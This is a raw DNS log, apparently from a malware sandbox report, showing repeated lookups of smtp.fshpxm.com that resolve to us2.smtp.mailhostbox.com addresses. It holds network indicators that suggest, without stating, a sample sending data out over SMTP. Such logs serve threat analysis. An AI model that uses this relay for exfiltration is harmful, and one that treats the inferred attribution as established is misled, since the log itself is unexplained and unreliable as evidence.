                                                                                      Apr 18, 2024 10:25:15.968234062 CEST8.8.8.8192.168.2.220x3b5bNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:15.968234062 CEST8.8.8.8192.168.2.220x3b5bNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:15.968234062 CEST8.8.8.8192.168.2.220x3b5bNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.053479910 CEST8.8.8.8192.168.2.220x128eNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.053479910 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.053479910 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.053479910 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.053479910 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.073370934 CEST8.8.8.8192.168.2.220x3b5bNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.073370934 CEST8.8.8.8192.168.2.220x3b5bNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.073370934 CEST8.8.8.8192.168.2.220x3b5bNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.073370934 CEST8.8.8.8192.168.2.220x3b5bNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.073370934 CEST8.8.8.8192.168.2.220x3b5bNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.158512115 CEST8.8.8.8192.168.2.220x128eNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.158512115 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.158512115 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.158512115 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.158512115 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.177798033 CEST8.8.8.8192.168.2.220x3b5bNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.177798033 CEST8.8.8.8192.168.2.220x3b5bNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.177798033 CEST8.8.8.8192.168.2.220x3b5bNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.177798033 CEST8.8.8.8192.168.2.220x3b5bNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.177798033 CEST8.8.8.8192.168.2.220x3b5bNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.263518095 CEST8.8.8.8192.168.2.220x128eNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.263518095 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.263518095 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.263518095 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.263518095 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.368520021 CEST8.8.8.8192.168.2.220x128eNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.368520021 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.368520021 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.368520021 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.368520021 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.473067999 CEST8.8.8.8192.168.2.220x128eNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.473067999 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.473067999 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.473067999 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:16.473067999 CEST8.8.8.8192.168.2.220x128eNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.098417997 CEST8.8.8.8192.168.2.220xfd45No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.098417997 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.098417997 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.098417997 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.098417997 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.203258038 CEST8.8.8.8192.168.2.220xfd45No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.203258038 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.203258038 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.203258038 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.203258038 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.308247089 CEST8.8.8.8192.168.2.220xfd45No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.308247089 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.308247089 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.308247089 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.308247089 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.412888050 CEST8.8.8.8192.168.2.220xfd45No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.412888050 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.412888050 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.412888050 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.412888050 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.518621922 CEST8.8.8.8192.168.2.220xfd45No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.518621922 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.518621922 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.518621922 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:17.518621922 CEST8.8.8.8192.168.2.220xfd45No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.578928947 CEST8.8.8.8192.168.2.220xbe92No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.578928947 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.578928947 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.578928947 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.578928947 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.683840036 CEST8.8.8.8192.168.2.220xbe92No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.683840036 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.683840036 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.683840036 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.683840036 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.788434982 CEST8.8.8.8192.168.2.220xbe92No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.788434982 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.788434982 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.788434982 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.788434982 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.876569033 CEST8.8.8.8192.168.2.220x82b5No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.876569033 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.876569033 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.876569033 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.876569033 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.893927097 CEST8.8.8.8192.168.2.220xbe92No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.893927097 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.893927097 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.893927097 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.893927097 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.981931925 CEST8.8.8.8192.168.2.220x82b5No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.981931925 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.981931925 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.981931925 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.981931925 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.998943090 CEST8.8.8.8192.168.2.220xbe92No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.998943090 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.998943090 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.998943090 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:18.998943090 CEST8.8.8.8192.168.2.220xbe92No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.086460114 CEST8.8.8.8192.168.2.220x82b5No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.086460114 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.086460114 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.086460114 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.086460114 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.191555977 CEST8.8.8.8192.168.2.220x82b5No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.191555977 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.191555977 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.191555977 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.191555977 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.296025038 CEST8.8.8.8192.168.2.220x82b5No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.296025038 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.296025038 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.296025038 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.296025038 CEST8.8.8.8192.168.2.220x82b5No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.955492973 CEST8.8.8.8192.168.2.220x152eNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.955492973 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.955492973 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.955492973 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:19.955492973 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.060045958 CEST8.8.8.8192.168.2.220x152eNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.060045958 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.060045958 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.060045958 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.060045958 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.176865101 CEST8.8.8.8192.168.2.220x152eNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.176865101 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.176865101 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.176865101 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.176865101 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.281358004 CEST8.8.8.8192.168.2.220x152eNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.281358004 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.281358004 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.281358004 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.281358004 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.386228085 CEST8.8.8.8192.168.2.220x152eNo error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.386228085 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.386228085 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.386228085 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:20.386228085 CEST8.8.8.8192.168.2.220x152eNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.403492928 CEST8.8.8.8192.168.2.220xae52No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.403492928 CEST8.8.8.8192.168.2.220xae52No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.403492928 CEST8.8.8.8192.168.2.220xae52No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.403492928 CEST8.8.8.8192.168.2.220xae52No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.403492928 CEST8.8.8.8192.168.2.220xae52No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.508846045 CEST8.8.8.8192.168.2.220xae52No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.508846045 CEST8.8.8.8192.168.2.220xae52No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.508846045 CEST8.8.8.8192.168.2.220xae52No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.508846045 CEST8.8.8.8192.168.2.220xae52No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.508846045 CEST8.8.8.8192.168.2.220xae52No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.614125967 CEST8.8.8.8192.168.2.220xae52No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.614125967 CEST8.8.8.8192.168.2.220xae52No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.614125967 CEST8.8.8.8192.168.2.220xae52No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.614125967 CEST8.8.8.8192.168.2.220xae52No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.614125967 CEST8.8.8.8192.168.2.220xae52No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.698522091 CEST8.8.8.8192.168.2.220xa706No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.698522091 CEST8.8.8.8192.168.2.220xa706No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.698522091 CEST8.8.8.8192.168.2.220xa706No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.698522091 CEST8.8.8.8192.168.2.220xa706No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.698522091 CEST8.8.8.8192.168.2.220xa706No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.726119041 CEST8.8.8.8192.168.2.220x60b5No error (0)smtp.fshpxm.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.726119041 CEST8.8.8.8192.168.2.220x60b5No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.726119041 CEST8.8.8.8192.168.2.220x60b5No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.726119041 CEST8.8.8.8192.168.2.220x60b5No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:21.726119041 CEST8.8.8.8192.168.2.220x60b5No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
